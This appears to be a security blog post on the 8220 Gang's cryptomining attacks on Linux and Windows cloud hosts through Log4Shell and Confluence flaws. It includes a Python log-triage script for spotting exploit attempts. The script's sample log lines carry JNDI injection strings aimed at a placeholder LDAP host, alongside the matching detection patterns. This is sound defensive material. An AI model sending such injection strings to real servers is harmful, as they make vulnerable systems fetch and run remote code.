
A recent increase in attacks has been observed from the 8220 Gang, a cybercriminal group from China. The group has become notorious for infiltrating cloud-based infrastructure and exploiting vulnerabilities to mine cryptocurrency from Linux and Windows users.

How Do These Attacks Work & How Can I Mitigate My Risk?

One of the most significant concerns surrounding these attacks is the group's use of well-known vulnerabilities, such as CVE-2021-44228 and CVE-2022-26134, which poses a heightened risk to cloud security worldwide. The 8220 Gang identifies potential entry points through internet scans and exploits unpatched vulnerabilities to gain unauthorized access to cloud systems. This shift towards more sophisticated techniques is a critical evolution in cyber threats facing cloud infrastructure today.

The implications of these attacks are far-reaching, affecting countless organizations that rely on cloud infrastructure. The group's tools, including Tsunami malware, the XMRIG cryptominer, masscan, and spirit, allow it to deploy cryptocurrency miners on compromised Linux and Windows hosts. This poses significant risks to the integrity and performance of the affected systems and enables the attackers to profit from unauthorized mining operations.

Organizations must prioritize cloud security and adopt comprehensive strategies to protect against these advanced threats. This includes ensuring that all systems are regularly updated and patched, implementing robust security measures, and maintaining vigilance for any signs of compromise. As the 8220 Gang continues to evolve its strategies, the cybersecurity community must remain proactive in detecting and mitigating these threats.
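One way to watch for attempts against the two CVEs named above is to triage web access logs. The following is an added example, not code from this article or from any vendor. It assumes combined-format access logs, and the marker strings are the publicly documented request patterns for these CVEs rather than details given in this article. The log lines and addresses are constructed.

```python
import re
from urllib.parse import unquote

# Constructed sample lines in combined log format (not taken from the article).
SAMPLE_LOG = [
    '198.51.100.7 - - [01/Jan/2024:10:00:00 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.8 - - [01/Jan/2024:10:00:01 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://192.0.2.10/a}"',
    '198.51.100.9 - - [01/Jan/2024:10:00:02 +0000] "GET /%24%7BPLACEHOLDER_EXPRESSION%7D/ HTTP/1.1" 302 0 "-" "curl/8.0"',
    '198.51.100.9 - - [01/Jan/2024:10:00:03 +0000] "GET /search?q=%2524%257Bjndi%253Adns%253A%252F%252F192.0.2.10%257D HTTP/1.1" 200 90 "-" "curl/8.0"',
]

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<target>\S+) [^"]*" '
    r'\d{3} \S+ "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"'
)

def normalise(value, max_rounds=3):
    """Percent-decode repeatedly so layered encoding cannot hide a marker."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value.lower()

def classify(line):
    """Return (client_ip, [suspected CVE ids]) for a suspicious line, else None."""
    m = LINE_RE.match(line)
    if not m:
        return None
    findings = []
    # CVE-2021-44228: a JNDI lookup string in any field an application may log.
    if any("${jndi:" in normalise(m[k]) for k in ("target", "referer", "agent")):
        findings.append("CVE-2021-44228")
    # CVE-2022-26134: an expression delimiter inside the URI path itself.
    path = normalise(m["target"].split("?", 1)[0])
    if "${" in path:
        findings.append("CVE-2022-26134")
    return (m["ip"], findings) if findings else None

def scan(lines):
    """Classify every line and keep only the hits, in log order."""
    return [hit for hit in map(classify, lines) if hit]

if __name__ == "__main__":
    for ip, cves in scan(SAMPLE_LOG):
        print(ip, ",".join(cves))
```

A hit records an attempt, not a compromise; whether it succeeded depends on the patch level of the system that received the request.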

This situation raises several questions regarding the responsibility of organizations to ensure their cloud infrastructure remains secure, particularly in the wake of new and more sophisticated techniques used by cybercriminals. Companies need to invest in cybersecurity and prioritize responses to emerging cyber threats. Furthermore, the 8220 Gang's recent campaigns highlight the need for further collaboration and information sharing between international cybersecurity experts to prevent such attacks from becoming widespread.

Our Final Thoughts on Combating This Increase in Attacks

The 8220 Gang's recent escalation in attacks on both Linux and Windows users is concerning. Organizations must ensure all systems are regularly updated and patched and adopt robust security measures to protect against advanced threats. The cybersecurity community must remain proactive in detecting and mitigating these threats. 
